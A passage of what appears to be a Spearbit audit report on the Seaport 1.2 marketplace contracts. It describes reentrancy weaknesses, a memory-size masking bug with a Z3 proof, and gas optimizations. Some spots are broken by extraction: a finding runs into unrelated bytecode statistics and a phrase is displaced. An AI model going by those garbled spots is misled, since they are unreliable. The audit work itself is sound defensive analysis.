Note: for Seaport 1.1's zone, the check _assertRestrictedBasicOrderValidity happens before the transfers, and it is also a staticcall. In the future, Seaport 1.3 could also have the same zone interaction, i.e., stateful calls to zones, allowing for complex cross-Seaport re-entrancy between 1.2 and 1.3.

Note: also see getOrderStatus and getContractOffererNonce are prone to view reentrancy for concerns around view-only re-entrancy.

Recommendation:

• Document that cross-Seaport re-entrancy can be possible in general, and potentially problematic when paired with _assertRestrictedBasicOrderValidity / validateOrder and when the conduit has open channels with multiple versions of Seaport.
• Avoid having open channels to both Seaport 1.1 and Seaport 1.2 at the same time, or between multiple versions of Seaport.
• For Zones with complex logic, consider deploying a new Conduit and carefully consider the risk of opening new channels.

Seaport: Acknowledged.

Spearbit: Acknowledged.
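A sketch of the channel-management mitigation, assuming the standard ConduitController interface (updateChannel); the migrate helper and addresses are hypothetical:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

interface IConduitController {
    function updateChannel(address conduit, address channel, bool isOpen) external;
}

contract ConduitChannelMigration {
    // Close the channel to the old Seaport before opening one to the new
    // version, so that a single conduit never bridges stateful zone calls
    // across deployments. In practice only the conduit's owner can do this.
    function migrate(
        IConduitController controller,
        address conduit,
        address oldSeaport,
        address newSeaport
    ) external {
        controller.updateChannel(conduit, oldSeaport, false);
        controller.updateChannel(conduit, newSeaport, true);
    }
}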
+5.2.11 getOrderStatus and getContractOffererNonce are prone to view reentrancy

Severity: Low Risk

Context:

• Consideration.sol#L548
• Consideration.sol#L607
• OrderValidator.sol#L84-L87
• OrderValidator.sol#L277-L280
• OrderValidator.sol#L284-L287
• OrderValidator.sol#L382

Description: In a Consideration or Seaport contract, when a mix of contract offerer orders and partial orders is used, once _orderStatus[orderHash] or _contractNonces[offerer] gets updated, Seaport would call into the offerer contracts (let's call one of these offerer contracts X). In turn, X can be a contract that calls into other contracts (let's call them Y) that take _orderStatus[orderHash] or _contractNonces[offerer] into consideration in their codebase by calling getOrderStatus or getContractOffererNonce. The values of _orderStatus[orderHash] or _contractNonces[offerer] might get updated again after Y reads them from Seaport, due to, for example, multiple partial orders with the same orderHash or multiple offerer contract orders using the same offerer. Therefore, Y would only take into consideration the mid-flight values and not the final ones after the whole transaction with Seaport is completed.

Recommendation: We need to either make sure to update the storage parameters at the end of the call to Seaport's order fulfilling/matching endpoints (after all the calls to external contracts), or add an _assertNonReentrant() guard to the getOrderStatus and getContractOffererNonce endpoints to prevent other contracts Y from reading mid-flight storage parameters.

Seaport: Acknowledged.

Spearbit: Acknowledged.

+5.2.12 The size calculation can be incorrect for large numbers

Context: ConsiderationEncoder.sol#L53-L63, ConsiderationConstants.sol#L113

Description: The maximum value of a memory offset is defined in PointerLibraries.sol#L22 as OffsetOrLengthMask = 0xffffffff, i.e., 2^32 - 1. However, the mask OnlyFullWordMask = 0xffffe0 is defined to be a 24-bit number. Assume that the length of the bytes type where src points is 0xffffe0; then the following piece of code incorrectly computes the size as 0.

function abi_encode_bytes(
    MemoryPointer src,
    MemoryPointer dst
) internal view returns (uint256 size) {
    unchecked {
        size =
            ((src.readUint256() & OffsetOrLengthMask) + AlmostTwoWords) &
            OnlyFullWordMask;
        ...

This is because the constant OnlyFullWordMask does not have the highest-order byte set (as a 32-bit type).

Note: in practice, it can be difficult to construct bytes of length 0xffffe0 due to the upper bound defined by the block gas limit. However, this length is still below Seaport's OffsetOrLengthMask, and therefore may be able to evade many checks.

Recommendation: Change the value of OnlyFullWordMask to 0xffffffe0. But this does not fully fix the problem: if len >= 0xffffffc1, the calculations can encounter the same issues. These numbers are impractical in the EVM, however, and therefore may not be of concern. There are two potential approaches to this:

1. Revert early if length is >= 0xffffffc1. This is the value beyond which add(len, 63) takes more than 32 bits.
2. Or assign a large value for the rounded-up length for any values >= 0xffffffc1. 2**32 - 1 is a possibility.

Option 1 would be consistent with Solidity-generated code--revert early if the length is too large for specific operations.

Here's the above Z3 proof with the extra constraint that the length is below 0xffffffc1. This is now unsatisfiable.
from z3 import *

def AND(x, y):
    return x & y

def ADD(x, y):
    return x + y

n_bits = 256
symb_len = BitVec('Len', n_bits)
const_OnlyFullWordMask = BitVecVal(0xffffffe0, n_bits)
const_AlmostTwoWords = BitVecVal(0x3f, n_bits)

solver = Solver()

# The expression (for ConsiderationEncoder)
# from https://github.com/ProjectOpenSea/seaport/pull/798/files
expr = AND(ADD(symb_len, const_AlmostTwoWords), const_OnlyFullWordMask)

# Add an upper bound on the length
solver.add(ULT(symb_len, BitVecVal(0xffffffc1, n_bits)))

# A model where the expression evaluates to a `value < 32`. Such a model is now unsatisfiable
solver.add(ULT(expr, BitVecVal(32, n_bits)))

result = solver.check()
if result == sat:
    print("SAT!")
    print(solver.model())
else:
    print(result)

Seaport: Partially addressed in PR 798.

Spearbit: Verified.

5.3 Gas Optimization

+5.3.1 _prepareBasicFulfillmentFromCalldata expands memory more than is needed, by 4 extra words

Severity: Gas Optimization

Context:

• BasicOrderFulfiller.sol#L896

Description: In _prepareBasicFulfillmentFromCalldata, we have:

// Update the free memory pointer so that event data is persisted.
mstore(0x40, add(0x80, add(eventDataPtr, dataSize)))

OrderFulfilled's event data is stored in memory in the region [eventDataPtr, eventDataPtr + dataSize). It is important to note that eventDataPtr is an absolute memory pointer and not a relative one. So the 4 words, 0x80, in the above snippet are extra.

For example, in test/basic.spec.ts, in the "ERC721 <=> ETH (basic, minimal and verified on-chain)" test case, the Seaport memory profile at the end of the call marketplaceContract.connect(buyer).fulfillBasicOrder(basicOrderParameters, { value }) looks like:

0x000 23b872dd000000000000000000000000f372379f3c48ad9994b46f36f879234a ; transferFrom.selector(from, to, id)
0x020 27b4556100000000000000000000000016c53175c34f67c1d4dd0878435964c1 ; ...
0x040 0000000000000000000000000000000000000000000000000000000000000440 ; free memory pointer
0x060 0000000000000000000000000000000000000000000000000000000000000000 ; ZERO slot
0x080 fa445660b7e21515a59617fcd68910b487aa5808b8abda3d78bc85df364b2c2f ; orderTypeHash
0x0a0 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; offerer
0x0c0 0000000000000000000000000000000000000000000000000000000000000000 ; zone
0x0e0 78d24b64b38e96956003ddebb880ec8c1d01f333f5a4bfba07d65d5c550a3755 ; h(ho)
0x100 81c946a4f4982cb7ed0c258f32da6098760f98eaf6895d9ebbd8f9beccb293e7 ; h(hc, ha[0], ..., ha[n])
0x120 0000000000000000000000000000000000000000000000000000000000000000 ; orderType
0x140 0000000000000000000000000000000000000000000000000000000000000000 ; startTime
0x160 000000000000000000000000000000000000ff00000000000000000000000000 ; endTime
0x180 8f1d378d2acd9d4f5883b3b9e85385cf909e7ab825b84f5a6eba28c31ea5246a ; zoneHash > orderHash
0x1a0 00000000000000000000000016c53175c34f67c1d4dd0878435964c1c9b70db7 ; salt > fulfiller
0x1c0 0000000000000000000000000000000000000000000000000000000000000080 ; offererConduitKey > offer array head
0x1e0 0000000000000000000000000000000000000000000000000000000000000120 ; counter[offerer] > consideration array head
0x200 0000000000000000000000000000000000000000000000000000000000000001 ; h[4]? > offer.length
0x220 0000000000000000000000000000000000000000000000000000000000000002 ; h[...]? > offer.itemType
0x240 000000000000000000000000c67947dc8d7fd0c2f25264f9b9313689a4ac39aa ; > offer.token
0x260 00000000000000000000000000000000c02c1411443be3c204092b54976260b9 ; > offer.identifierOrCriteria
0x280 0000000000000000000000000000000000000000000000000000000000000001 ; > offer's current interpolated amount
0x2a0 0000000000000000000000000000000000000000000000000000000000000001 ; > totalConsiderationRecipients + 1
0x2c0 0000000000000000000000000000000000000000000000000000000000000000 ; > receivedItemType
0x2e0 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.token (NATIVE)
0x300 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.identifierOrCriteria
0x320 0000000000000000000000000000000000000000000000000000000000000001 ; > consideration's current interpolated amount
0x340 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; > offerer
0x360 0000000000000000000000000000000000000000000000000000000000000000 ; unused
0x380 0000000000000000000000000000000000000000000000000000000000000000 ; unused
0x3a0 0000000000000000000000000000000000000000000000000000000000000000 ; unused
0x3c0 0000000000000000000000000000000000000000000000000000000000000000 ; unused
0x3e0 0000000000000000000000000000000000000000000000000000000000000040 ; sig.length
0x400 26aa4a333d4b615af662e63ce7006883f678068b8dc36f53f70aa79c28f2032c ; sig[ 0:31]
0x420 f640366430611c54bafd13314285f7139c85d69f423794f47ee088fc6bfbf43f ; sig[32:63]
0x440 0000000000000000000000000000000000000000000000000000000000000001 ; fulfilled = 1; // returns (bool fulfilled)

Notice the 4 unused memory slots.

• Transaction Trace

This is also a good example to see that certain memory slots that previously held values like zoneHash, salt, ... have been overwritten due to the small number of consideration items (this actually happens inside _prepareBasicFulfillmentFromCalldata).

Recommendation: The extra 4-word memory expansion can be removed from the context in question:

// Update the free memory pointer so that event data is persisted.
mstore(0x40, add(eventDataPtr, dataSize))

Besides reducing the memory expansion, this would also save at least 1 PUSH1 and 1 ADD.

Seaport: Fixed in commit e07499.

Spearbit: Verified.

+5.3.2 TypehashDirectory's constructor code can be optimized.
Severity: Gas Optimization

Context:

• TypehashDirectory.sol#L75

Description: TypehashDirectory's deployed bytecode in its current form is:

00
3ca2711d29384747a8f61d60aad3c450405f7aaff5613541dee28df2d6986d32 ; h_00
bf8e29b89f29ed9b529c154a63038ffca562f8d7cd1e2545dda53a1b582dde30 ; h_01
53c6f6856e13104584dd0797ca2b2779202dc2597c6066a42e0d8fe990b0024d ; h_02
a02eb7ff164c884e5e2c336dc85f81c6a93329d8e9adf214b32729b894de2af1 ; h_03
39c9d33c18e050dda0aeb9a8086fb16fc12d5d64536780e1da7405a800b0b9f6 ; h_04
1c19f71958cdd8f081b4c31f7caf5c010b29d12950be2fa1c95070dc47e30b55 ; h_05
ca74fab2fece9a1d58234a274220ad05ca096a92ef6a1ca1750b9d90c948955c ; h_06
7ff98d9d4e55d876c5cfac10b43c04039522f3ddfb0ea9bfe70c68cfb5c7cc14 ; h_07
bed7be92d41c56f9e59ac7a6272185299b815ddfabc3f25deb51fe55fe2f9e8a ; h_08
d1d97d1ef5eaa37a4ee5fbf234e6f6d64eb511eb562221cd7edfbdde0848da05 ; h_09
896c3f349c4da741c19b37fec49ed2e44d738e775a21d9c9860a69d67a3dae53 ; h_10
bb98d87cc12922b83759626c5f07d72266da9702d19ffad6a514c73a89002f5f ; h_11
e6ae19322608dd1f8a8d56aab48ed9c28be489b689f4b6c91268563efc85f20e ; h_12
6b5b04cbae4fcb1a9d78e7b2dfc51a36933d023cf6e347e03d517b472a852590 ; h_13
d1eb68309202b7106b891e109739dbbd334a1817fe5d6202c939e75cf5e35ca9 ; h_14
1da3eed3ecef6ebaa6e5023c057ec2c75150693fd0dac5c90f4a142f9879fde8 ; h_15
eee9a1392aa395c7002308119a58f2582777a75e54e0c1d5d5437bd2e8bf6222 ; h_16
c3939feff011e53ab8c35ca3370aad54c5df1fc2938cd62543174fa6e7d85877 ; h_17
0efca7572ac20f5ae84db0e2940674f7eca0a4726fa1060ffc2d18cef54b203d ; h_18
5a4f867d3d458dabecad65f6201ceeaba0096df2d0c491cc32e6ea4e64350017 ; h_19
80987079d291feebf21c2230e69add0f283cee0b8be492ca8050b4185a2ff719 ; h_20
3bd8cff538aba49a9c374c806d277181e9651624b3e31111bc0624574f8bca1d ; h_21
5d6a3f098a0bc373f808c619b1bb4028208721b3c4f8d6bc8a874d659814eb76 ; h_22
1d51df90cba8de7637ca3e8fe1e3511d1dc2f23487d05dbdecb781860c21ac1c ; h_23 for height 24

Recommendation: It might be cheaper to pre-calculate the hashes off-chain and unroll the loop used, since the length is known (24). If this recommendation is accepted, it should be accompanied by unit and differential tests to guarantee the correctness of the hardcoded hash values.

Seaport: Acknowledged.

Spearbit: Acknowledged.

+5.3.3 ConsiderationItem.recipient's absolute memory offset can be cached and reused

Severity: Gas Optimization

Context:

• OrderCombiner.sol#L388-L391
• OrderCombiner.sol#L402-L405

Description: ConsiderationItem.recipient's absolute offset is calculated twice in the above context.

Recommendation: Perhaps we can cache this calculation and reuse it.

Seaport: Fixed in commit a13bc2.

Spearbit: Verified.

+5.3.4 currentAmount can potentially be reused when storing this value in memory in _validateOrdersAndPrepareToFulfill

Severity: Gas Optimization

Context:

• OrderCombiner.sol#L375
• OrderCombiner.sol#L406-L411

Description: We have:

considerationItem.startAmount = currentAmount; // 1
...
mload( // 2
    add(
        considerationItem,
        ReceivedItem_amount_offset
    )
)

From 1, where considerationItem.startAmount is assigned, until 2, its value is not modified.

Recommendation: It might be cheaper to use currentAmount (depends on the stack juggling by the compiler):

considerationItem.startAmount = currentAmount; // 1
...
currentAmount // 2

Seaport: Fixed in PR 828.

Spearbit: Verified.
+5.3.5 Information packed in BasicOrderType and how receivedItemType and offeredItemType are derived

Severity: Gas Optimization

Context:

• BasicOrderFulfiller.sol#L142-L145
• BasicOrderFulfiller.sol#L149-L155
• ConsiderationEnums.sol#L23

Description: Currently, the way information is packed in and unpacked from BasicOrderType is inefficient. BasicOrderType is only used in BasicOrderParameters, and when unpacking, to give an idea of how the different parameters are packed into this field.

Recommendation: Save gas by using a bit-packed uint256 in BasicOrderParameters instead:

struct BasicOrderParameters {
    ...
    uint256 basicOrderType; // 0x124
    ...
}

where orderType, route, receivedItemType and offeredItemType are packed as:

0b 00 ... 00 xx yy zz

zz:   orderType
yy:   offeredItemType
xx:   receivedItemType
xxyy: route

Then, when unpacking these values in _validateAndFulfillBasicOrder, we would only need to do:

let orderType := and(3, basicOrderType)
let route := and(15, shr(2, basicOrderType))
let offeredItemType := and(3, route)
let receivedItemType := and(3, shr(2, route))

And then BasicOrderRouteType would also need to be replaced by a collection of allowed route constants:

// RECEIVED_TO_OFFERED
uint256 constant ETH_TO_ERC721    = 0x02; // 0b 00 10
uint256 constant ETH_TO_ERC1155   = 0x03; // 0b 00 11
uint256 constant ERC20_TO_ERC721  = 0x06; // 0b 01 10
uint256 constant ERC20_TO_ERC1155 = 0x07; // 0b 01 11
uint256 constant ERC721_TO_ERC20  = 0x09; // 0b 10 01
uint256 constant ERC1155_TO_ERC20 = 0x0d; // 0b 11 01

These constants can be used when routing. We can also add an additional/final else block for when route is not one of the allowed route constants. This suggestion would save gas and simplify/remove the complexity of unpacking basicOrderType.

Warning: If backward compatibility for the frontend/backend is important for these values, one can apply the following when deriving receivedItemType and offeredItemType:

• receivedItemType

Can be simplified to t = (r >> 1) + (r > 4):

receivedItemType := add(shr(1, route), gt(route, 4))

or, if the codesize has some extra wiggle room:

receivedItemType := byte(route, 0x0000010102030000000000000000000000000000000000000000000000000000)

• offeredItemType

The expression can be simplified to t = 0b011 & (r | (1 + (r < 0b100))):

offeredItemType := and(3, or(route, add(1, lt(route, 4))))

or, if the codesize has some extra wiggle room:

offeredItemType := byte(route, 0x0203020301010000000000000000000000000000000000000000000000000000)

Seaport: Acknowledged.

Spearbit: Acknowledged.
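The suggested packing can be exercised end to end with a small sketch (a hypothetical contract; the unpacking assembly mirrors the recommendation above):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

contract BasicOrderTypePacking {
    // zz = orderType (low 2 bits), xxyy = route (next 4 bits), where
    // yy = offeredItemType and xx = receivedItemType.
    function pack(uint256 orderType, uint256 route)
        public
        pure
        returns (uint256 basicOrderType)
    {
        basicOrderType = (route << 2) | orderType;
    }

    function unpack(uint256 basicOrderType)
        public
        pure
        returns (
            uint256 orderType,
            uint256 route,
            uint256 offeredItemType,
            uint256 receivedItemType
        )
    {
        assembly {
            orderType := and(3, basicOrderType)
            route := and(15, shr(2, basicOrderType))
            offeredItemType := and(3, route)
            receivedItemType := and(3, shr(2, route))
        }
    }
}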
Spearbit: Verified. +5.3.7 When accessing or writing to memory the value of an enum for a struct field, the enum's validation is performed Severity: Gas Optimization Context: • CriteriaResolution.sol#L68 • CriteriaResolution.sol#L98 • CriteriaResolution.sol#L150 • CriteriaResolution.sol#L164 • CriteriaResolution.sol#L189 • CriteriaResolution.sol#L215 • Executor.sol#L58 • Executor.sol#L66 • Executor.sol#L81 • FulfillmentApplier.sol#L84 • OrderCombiner.sol#L675 • OrderCombiner.sol#L781 • OrderFulfiller.sol#L206 • OrderFulfiller.sol#L314 33 • OrderValidator.sol#L134 • OrderValidator.sol#L158 • OrderValidator.sol#L323 • OrderValidator.sol#L593 • ZoneInteraction.sol#L108 • ZoneInteraction.sol#L118 Description: When accessing or writing to memory the value of an enum type for a struct field, the enum's validation is performed: enum Foo { f1, f2, ... fn } struct boo { Foo foo; ... } boo memory b; P(b.foo); // <--- validation will be performed to check whether the value of `b.foo` is out of range This would apply to OrderComponents.orderType, OrderParameters.orderType, CriteriaResolver.side, ReceivedItem.itemType, OfferItem.itemType, BasicOrderParameters.basicOrderType. ConsiderationItem.itemType, SpentItem.itemType, Recommendation: If one would like to avoid these validations, assembly blocks would need to be used instead of high-level Solidity. The ConsiderationDecoder currently skips these validations. If validating these values is required, it would be best to consolidate them into one location and also to make sure the validation only happens once. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.8 The zero memory slot can be used when supplying no criteria to fulfillOrder, fulfillAvailable- Orders, and matchOrders Severity: Gas Optimization Context: • Consideration.sol#L114 • Consideration.sol#L243 • Consideration.sol#L392 Description: When the external functions in this context are called, no criteria is passed to _validateAndFulfil- lAdvancedOrder, _fulfillAvailableAdvancedOrders, or _matchAdvancedOrders: new CriteriaResolver[](0), // No criteria resolvers supplied. When this gets compiled into YUL, the compiler updates the free memory slot by a word and performs an out of range and overflow check for this value: 34 function allocate_memory_() -> memPtr { memPtr := mload(64) let newFreePtr := add(memPtr, 32) if or(gt(newFreePtr, 0xffffffffffffffff), lt(newFreePtr, memPtr)) { panic_error_0x41() } mstore(64, newFreePtr) } Recommendation: One can avoid incrementing the free memory pointer and the checks by passing the zero memory slot pointer. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.9 matchOrders, matchAdvancedOrders, fulfillAvailableAdvancedOrders, fulfillAvailableOrders re- turns executions which is cleaned and validator by the compiler Severity: Gas Optimization Context: • Consideration.sol#L441-L452 • Consideration.sol#L385 • Consideration.sol#L334 • Consideration.sol#L234 Description: Currently, the return values of matchOrders, matchAdvancedOrders, fulfillAvailableAdvance- dOrders, fulfillAvailableOrders are cleaned and validator by the compiler. Recommendation: One can use the/a custom encoder to avoid the extra cleanup/validation. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.10 abi.encodePacked is used when only bytes/string concatenation is needed. 
Severity: Gas Optimization Context: • ConsiderationBase.sol#L200-L208 • ConsiderationBase.sol#L212-L221 • ConsiderationBase.sol#L225-L239 • ConsiderationBase.sol#L244-L251 • ConsiderationBase.sol#L260-L264 • TypehashDirectory.sol#L27-L35 • TypehashDirectory.sol#L39-L48 • TypehashDirectory.sol#L52-L66 • TypehashDirectory.sol#L94-L100 Description: In the context above, one is using abi.encodePacked like the following: 35 bytes memory B = abi.encodePacked( "", "", ... "" ); For each substring, this causes the compiler to use an mstore (if the substring occupies more than 32 bytes, it will use the least amount of mstores which is the ceiling of the length of substring divided by 32), even though multiple substrings can be combined to fill in one memory slot and thus only use 1 mstore for those. Recommendation: It is recommended to convert the above code snippets to: bytes memory B = bytes( "" "" ... "" ); and for the particular case of TypehashDirectory.sol#L94-L100: bytes memory bulkOrderTypeString = abi.encodePacked( "BulkOrder(OrderComponents", brackets, " tree)", subTypes ); Replace abi.encodePacked with ConsiderationBase.sol#L260-L264). Seaport: Fixed in PR 841. Spearbit: Verified. bytes.concat or string.concat (this rule also applies to +5.3.11 solc ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent Severity: Gas Optimization Context: OrderFulfiller.sol#L378-L385 Description: solc's ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent. That means all the parameters are cleaned and validated before they are provided to log3. Recommendation: We can avoid the clean-up and validation by utilizing the/a custom encoder (ConsiderationEncoder). Seaport: Acknowledged. Spearbit: Acknowledged. 36 +5.3.12 The use of identity precompile to copy memory need not be optimal across chains Severity: Gas Optimization Context: PointerLibraries.sol#L267 Description: The PointerLibraries contract uses a staticcall to identity precompile, i.e., address 4 to copy memory--poor man's memcpy. This is used as a cheaper alternative to copy 32-byte chunks of memory using mstore(...) in a for-loop. However, the gas efficiency of the identity precompile relies on the version of the EVM on the underlying chain. The base call cost for precompiles before Berlin hardfork was 700 (from Tangerine Wistle), and after Berlin, this was reduced to 100 (for warm accounts and precompiles). Many EVM compatible L1s, and even L2s are on old EVM versions. And using the identity precompile would be more expensive than doing mstores(...). Recommendation: If Seaport is aiming to be optimized across chains, then the tradeoff between identity pre- compile v/s mstore(...) needs to be analysed--the overhead of 700 gas may make copies below a certain threshold in words to be more expensive than using mstore(...). However, this optimization need not be worth the maintenance burden. Seaport: Definitely less important (but still desirable) for it to be fully optimized on other chains. We definitely want the source to be consistent across all chains, however! Spearbit: Acknowledged. +5.3.13 Use the zero memory slot for allocating empty data Severity: Gas Optimization Context: ConsiderationDecoder.sol#L185-L188, ConsiderationDecoder.sol#L416 Description: In cases where an empty data needs to be allocated, one can use the zero slot. This can also be used as initial values for offer and consideration in abi_decode_generateOrder_returndata. 
Recommendation: For getEmptyBytesOrArray, the following can be made: function getEmptyBytesOrArray() internal pure returns (MemoryPointer mPtr) { - - + mPtr = malloc(32); mPtr.write(0); mPtr = MemoryPointer.wrap(0x60) In case of abi_decode_generateOrder_returndata, if the order is invalid, the function returns a memory pointer pointing to the slot 0x0 for the variables offer and consideration. The memory region [0, 32) is explicitly zeroed to cover this case. Instead of that, offer and consideration can be initialized to 0x60. Seaport: Acknowledged. Spearbit: Acknowledged. 37 +5.3.14 Some address fields are masked even though the ConsiderationDecoder wanted to skip this mask- ing Severity: Gas Optimization Context: • ZoneInteraction.sol#L10 • ZoneInteraction.sol#L61 • OrderValidator.sol#L598 • BasicOrderFulfiller.sol#L269 • BasicOrderFulfiller.sol#L196-L197 • BasicOrderFulfiller.sol#L207 • BasicOrderFulfiller.sol#L222-L223 • BasicOrderFulfiller.sol#L233-L234 • BasicOrderFulfiller.sol#L244 • BasicOrderFulfiller.sol#L246 • BasicOrderFulfiller.sol#L257 • BasicOrderFulfiller.sol#L259 • BasicOrderFulfiller.sol#L269 • OrderCombiner.sol#L562-L563 • OrderCombiner.sol#L591-L592 • OrderCombiner.sol#L458-L459 • OrderFulfiller.sol#L126-L127 • Executor.sol#L65 • Executor.sol#L74 • Executor.sol#L76 • Executor.sol#L84 • Executor.sol#L86 • Executor.sol#L95 • Executor.sol#L97 • Executor.sol#L60 - cleaned 3 times in the same spot • FulfillmentApplier.sol#L133 • OrderFulfiller.sol#L242 • OrderValidator.sol#L186 • OrderValidator.sol#L367 • ZoneInteraction.sol#L61 • ZoneInteraction.sol#L68 • Consideration.sol#L610 • GettersAndDerivers.sol#L323 • BasicOrderFulfiller.sol#L902 38 • Consideration.sol#L576 • FulfillmentApplier.sol#L177 • OrderValidator.sol#L634 Subset of find contracts/lib/ -type f -exec grep -nH --color -E ,! "\.(offerer|zone|token|recipient|considerationToken|offerToken)" {} \; Description: When a field of address type from a struct in memory is used, the compiler masks (also: 2, 3) it. struct A { address addr; } A memory a; // P is either a statement or a function call // when compiled --> and(mload(a_addr_pos), 0xffffffffffffffffffffffffffffffffffffffff) P(a.addr); Also the compiler is making use of function cleanup_address(value) -> cleaned { cleaned := and(value, 0xffffffffffffffffffffffffffffffffffffffff) } function abi_encode_address(value, pos) { mstore(pos, and(value, 0xffffffffffffffffffffffffffffffffffffffff)) } in a few places Recommendation: To prevent this masking (which is also what is intended by the ConsiderationDecoder for fields like zone, offerer, recipient, token ...), one should instead write statements in assembly and also when passing variables to functions, memory or calldata pointers should be used. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.15 div(x, (1< add(x, -4), used in dispatching to compare calldatasize with another value 8 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE0 // used for sub(x, ,! 0x20) -> add(x, -0x20) 6 PUSH32 0x4CE34AA200000000000000000000000000000000000000000000000000000000 // ,! Conduit_execute_signature 5 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF // used for sub(x, ,! 1) -> add(x, -1) 4 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00 // used to mask out ,! isValidated 4 PUSH32 0x4E487B7100000000000000000000000000000000000000000000000000000000 // ,! 
Panic_error_selector 3 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE4 // used for sub(x, ,! 0x3c - 0x20) -> add(x, -(0x3c - 0x20)), related to accumulator token offset 3 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC4 // related to ,! accumulator itemType offset 3 PUSH32 0x9D9AF8E38D66C62E2C12F0225249FD9D721C54B83F48D9352C97C6CACDCB6F31 // OrderFulfilled ,! topic0 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE1 // used for sub(x, ,! 0x1f) -> add(x, -0x1f) 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC0 // used for sub(x, ,! 0x40) -> add(x, -0x40) 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000FF // masks numerator ,! and isCancelled 2 PUSH32 0xFFFFFFFF00000000000000000000000000000000000000000000000000000000 // masks Conduit's ,! return data to compare with ConduitInterface.execute.selector 2 PUSH32 0x23B872DD00000000000000000000000000000000000000000000000000000000 // ,! ERC20_transferFrom_signature 2 PUSH32 0x1901000000000000000000000000000000000000000000000000000000000000 // EIP_712_PREFIX 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE // used for sub(x, ,! 2) -> add(x, -2) , when calculating receivedItemType 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBF // used for sub(x, ,! 0x41) -> add(x, -0x41), height := div(sub(fullLength, signatureLength), 0x20) 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBC // used for sub(x, ,! 0x44) -> add(x, -0x44), EIP1271_isValidSignature_selector_negativeOffset 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9D // used for sub(x, ,! 0x63) -> add(x, -0x63), sub(length, BulkOrderProof_minSize) 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEA1 // used for sub(x, 0x63) -> add(x, -0x63), calldata_array_index_access_struct_OrderComponents_calldata_dyn_calldata ,! 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000 // mask used to mask ,! out isCancelled and isValidated before canceling an order 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000 // used to only mask ,! the first 15 bytes (denominator) update_storage_value_offsett_uint120_to_t_uint120 1 PUSH32 0xF280791EFE782EDCF06CE15C8F4DFF17601DB3B88EB3805A0DB7D77FAF757F04 // ,! OrderValidated(orderHash, orderParameters) event topic0 1 PUSH32 0xF242432A00000000000000000000000000000000000000000000000000000000 // ,! ERC1155_safeTransferFrom_signature 1 PUSH32 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF // ,! EIP2098_allButHighestBitMask 1 PUSH32 0x721C20121297512B72821B97F5326877EA8ECF4BB9948FEA5BFCB6453074D37F // ,! CounterIncremented(uint256,address) event topic0 1 PUSH32 0x6BACC01DBE442496068F7D234EDD811F1A5F833243E0AEC824F86AB861F3C90D // ,! OrderCancelled(bytes32,address,address) event topic 0 1 PUSH32 0x1626BA7E00000000000000000000000000000000000000000000000000000000 // ,! EIP1271_isValidSignature_selector stat of push instructions excluding push2 213 PUSH1 0x0 41 212 PUSH1 0x20 194 PUSH1 0x40 111 PUSH1 0x1 88 PUSH1 0x60 78 PUSH1 0x4 77 PUSH1 0x80 69 PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF // when x.addr is passed to a function it ,! 
